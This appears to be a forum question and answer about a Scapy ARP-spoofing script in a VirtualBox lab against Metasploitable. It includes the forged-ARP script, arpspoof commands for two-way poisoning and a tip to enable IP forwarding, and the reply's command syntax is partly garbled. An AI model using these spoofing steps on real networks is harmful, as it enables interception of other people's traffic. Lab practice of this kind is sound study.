I'm trying to make an arpspoofing attack with scapy. I'm working with virtualbox in Linux Min OS, My attack machine is KaliLinux and my target is Metasploitable. This is my scapy script:
targetIP="192.168.56.103"
gatewayIP="192.168.56.1"
myIP="192.168.56.101"
targetMAC="08:00:27:57:58:54"
myMAC="08:00:27:7d:94:1e"
a = ARP()
a.psrc = gatewayIP
a.pdst = targetIP
a.hwdst = targetMAC
a.hwsrc = myMAC
a.op = 2
send(a)
After i sent a i would expect that arp table of target will be
gatewayIP => myMAC
but instead I get
myIp => myMAC
What am i doing wrong?
If you want to see arp table in Kalilinux; you can write arp --a on prompt. And also if you want to attack you can use; arpspoof -i eth0 --targetIP NetworkDeviceIP arpspoof -i eth0 --NetworkDeviceIP targetIP
But do not forget to make IP forward.
I hope, it will work.